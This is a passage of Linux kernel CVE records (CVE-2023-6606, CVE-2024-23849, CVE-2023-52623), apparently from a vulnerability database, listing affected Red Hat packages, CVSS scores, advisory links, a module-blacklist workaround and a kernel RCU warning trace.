"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::crb",
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.18.1.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/a:redhat:rhel_eus:8.6::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.95.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.8::baseos",
"cpe:/a:redhat:rhel_eus:8.8::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-477.51.1.el8_8",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.24.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.24.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::crb",
"cpe:/o:redhat:rhel_eus:9.2::baseos",
"cpe:/a:redhat:rhel_eus:9.2::appstream"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.52.1.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::nfv",
"cpe:/a:redhat:rhel_eus:9.2::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.52.1.rt14.337.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/a:redhat:rhel_eus:8.6::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.95.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-22",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-11",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch6-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v6.8.1-407",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-19",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-proxy-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.0.0-479",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/eventrouter-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.4.0-247",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/fluentd-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-5",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/log-file-metric-exporter-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.1.0-227",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-curator5-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.1-470",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-loki-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v2.9.6-14",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-view-plugin-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-24",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/lokistack-gateway-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-525",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/opa-openshift-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-224",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/vector-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.28.1-56",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unknown",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2023-12-04T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "An out-of-bounds read vulnerability was found in smbCalcSize in fs/smb/client/netmisc.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-08T07:10:24.326Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:0881",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0881"
},
{
"name": "RHSA-2024:0897",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0897"
},
{
"name": "RHSA-2024:1188",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1188"
},
{
"name": "RHSA-2024:1248",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1248"
},
{
"name": "RHSA-2024:1404",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1404"
},
{
"name": "RHSA-2024:2094",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2094"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6606"
},
{
"url": "https://bugzilla.kernel.org/show_bug.cgi?id=218218"
},
{
"name": "RHBZ#2253611",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253611"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-12-08T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2023-12-04T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: out-of-bounds read vulnerability in smbcalcsize",
"workarounds": [
{
"lang": "en",
"value": "To mitigate this issue, prevent module cifs from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically."
}
],
"x_redhatCweChain": "CWE-125: Out-of-bounds Read"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-6606",
"datePublished": "2023-12-08T16:58:08.746Z",
"dateReserved": "2023-12-08T07:45:03.358Z",
"dateUpdated": "2025-11-08T07:10:24.326Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-23849 (GCVE-0-2024-23849)
Vulnerability from cvelistv5
Published
2024-01-23 00:00
Modified
2025-11-04 18:28
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:28:54.659Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://lore.kernel.org/netdev/CALGdzuoVdq-wtQ4Az9iottBqC5cv9ZhcE5q8N7LfYFvkRsOVcw%40mail.gmail.com"
},
{
"tags": [
"x_transferred"
],
"url": "https://lore.kernel.org/netdev/1705715319-19199-1-git-send-email-sharath.srinivasan%40oracle.com/"
},
{
"name": "FEDORA-2024-2116a8468b",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/"
},
{
"name": "FEDORA-2024-cf47b35a6c",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LBVHM4LGMFIHBN4UBESYRFMYX3WUICV5/"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=13e788deb7348cc88df34bed736c3b3b9927ea52"
},
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1219127"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"name": "[debian-lts-announce] 20240627 [SECURITY] [DLA 3840-1] linux security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LBVHM4LGMFIHBN4UBESYRFMYX3WUICV5/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-23849",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-08T20:15:39.432722Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-193",
"description": "CWE-193 Off-by-one Error",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-05-30T14:21:26.249Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:11:50.049Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://lore.kernel.org/netdev/CALGdzuoVdq-wtQ4Az9iottBqC5cv9ZhcE5q8N7LfYFvkRsOVcw%40mail.gmail.com"
},
{
"url": "https://lore.kernel.org/netdev/1705715319-19199-1-git-send-email-sharath.srinivasan%40oracle.com/"
},
{
"name": "FEDORA-2024-2116a8468b",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/"
},
{
"name": "FEDORA-2024-cf47b35a6c",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LBVHM4LGMFIHBN4UBESYRFMYX3WUICV5/"
},
{
"url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=13e788deb7348cc88df34bed736c3b3b9927ea52"
},
{
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1219127"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"name": "[debian-lts-announce] 20240627 [SECURITY] [DLA 3840-1] linux security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2024-23849",
"datePublished": "2024-01-23T00:00:00.000Z",
"dateReserved": "2024-01-23T00:00:00.000Z",
"dateUpdated": "2025-11-04T18:28:54.659Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52623 (GCVE-0-2023-52623)
Vulnerability from cvelistv5
Published
2024-03-26 17:19
Modified
2025-05-22 13:30
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: Fix a suspicious RCU usage warning
I received the following warning while running cthon against an ontap
server running pNFS:
[ 57.202521] =============================
[ 57.202522] WARNING: suspicious RCU usage
[ 57.202523] 6.7.0-rc3-g2cc14f52aeb7 #41492 Not tainted
[ 57.202525] -----------------------------
[ 57.202525] net/sunrpc/xprtmultipath.c:349 RCU-list traversed in non-reader section!!
[ 57.202527]
other info that might help us debug this:
[ 57.202528]
rcu_scheduler_active = 2, debug_locks = 1
[ 57.202529] no locks held by test5/3567.
[ 57.202530]
stack backtrace:
[ 57.202532] CPU: 0 PID: 3567 Comm: test5 Not tainted 6.7.0-rc3-g2cc14f52aeb7 #41492 5b09971b4965c0aceba19f3eea324a4a806e227e
[ 57.202534] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS unknown 2/2/2022
[ 57.202536] Call Trace:
[ 57.202537] <TASK>
[ 57.202540] dump_stack_lvl+0x77/0xb0
[ 57.202551] lockdep_rcu_suspicious+0x154/0x1a0
[ 57.202556] rpc_xprt_switch_has_addr+0x17c/0x190 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6]
[ 57.202596] rpc_clnt_setup_test_and_add_xprt+0x50/0x180 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6]
[ 57.202621] ? rpc_clnt_add_xprt+0x254/0x300 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6]
[ 57.202646] rpc_clnt_add_xprt+0x27a/0x300 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6]
[ 57.202671] ? __pfx_rpc_clnt_setup_test_and_add_xprt+0x10/0x10 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6]
[ 57.202696] nfs4_pnfs_ds_connect+0x345/0x760 [nfsv4 c716d88496ded0ea6d289bbea684fa996f9b57a9]
[ 57.202728] ? __pfx_nfs4_test_session_trunk+0x10/0x10 [nfsv4 c716d88496ded0ea6d289bbea684fa996f9b57a9]
[ 57.202754] nfs4_fl_prepare_ds+0x75/0xc0 [nfs_layout_nfsv41_files e3a4187f18ae8a27b630f9feae6831b584a9360a]
[ 57.202760] filelayout_write_pagelist+0x4a/0x200 [nfs_layout_nfsv41_files e3a4187f18ae8a27b630f9feae6831b584a9360a]
[ 57.202765] pnfs_generic_pg_writepages+0xbe/0x230 [nfsv4 c716d88496ded0ea6d289bbea684fa996f9b57a9]
[ 57.202788] __nfs_pageio_add_request+0x3fd/0x520 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]
[ 57.202813] nfs_pageio_add_request+0x18b/0x390 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]
[ 57.202831] nfs_do_writepage+0x116/0x1e0 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]
[ 57.202849] nfs_writepages_callback+0x13/0x30 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]
[ 57.202866] write_cache_pages+0x265/0x450
[ 57.202870] ? __pfx_nfs_writepages_callback+0x10/0x10 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]
[ 57.202891] nfs_writepages+0x141/0x230 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]
[ 57.202913] do_writepages+0xd2/0x230
[ 57.202917] ? filemap_fdatawrite_wbc+0x5c/0x80
[ 57.202921] filemap_fdatawrite_wbc+0x67/0x80
[ 57.202924] filemap_write_and_wait_range+0xd9/0x170
[ 57.202930] nfs_wb_all+0x49/0x180 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]
[ 57.202947] nfs4_file_flush+0x72/0xb0 [nfsv4 c716d88496ded0ea6d289bbea684fa996f9b57a9]
[ 57.202969] __se_sys_close+0x46/0xd0
[ 57.202972] do_syscall_64+0x68/0x100
[ 57.202975] ? do_syscall_64+0x77/0x100
[ 57.202976] ? do_syscall_64+0x77/0x100
[ 57.202979] entry_SYSCALL_64_after_hwframe+0x6e/0x76
[ 57.202982] RIP: 0033:0x7fe2b12e4a94
[ 57.202985] Code: 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 80 3d d5 18 0e 00 00 74 13 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 44 c3 0f 1f 00 48 83 ec 18 89 7c 24 0c e8 c3
[ 57.202987] RSP: 002b:00007ffe857ddb38 EFLAGS: 00000202 ORIG_RAX: 0000000000000003
[ 57.202989] RAX: ffffffffffffffda RBX: 00007ffe857dfd68 RCX: 00007fe2b12e4a94
[ 57.202991] RDX: 0000000000002000 RSI: 00007ffe857ddc40 RDI: 0000000000000003
[ 57.202992] RBP: 00007ffe857dfc50 R08: 7fffffffffffffff R09: 0000000065650f49
[ 57.202993] R10: 00007f
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 39e5d2df959dd4aea81fa33d765d2a5cc67a0512 Version: 39e5d2df959dd4aea81fa33d765d2a5cc67a0512 Version: 39e5d2df959dd4aea81fa33d765d2a5cc67a0512 Version: 39e5d2df959dd4aea81fa33d765d2a5cc67a0512 Version: 39e5d2df959dd4aea81fa33d765d2a5cc67a0512 Version: 39e5d2df959dd4aea81fa33d765d2a5cc67a0512 Version: 39e5d2df959dd4aea81fa33d765d2a5cc67a0512 Version: 39e5d2df959dd4aea81fa33d765d2a5cc67a0512 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52623",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-04T15:58:01.744367Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-05-22T13:30:00.769Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.223Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fece80a2a6718ed58487ce397285bb1b83a3e54e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a96d85bf196c170dcf1b47a82e9bb97cca69aa6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c430e6bb43955c6bf573665fcebf31694925b9f7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f8cf4dabbdcb8bef85335b0ed7ad5b25fd82ff56"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e8ca3e73301e23e8c0ac0ce2e6bac4545cd776e0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/69c7eeb4f622c2a28da965f970f982db171f3dc6"
},
{
"tags": [
"x_transferred"
],
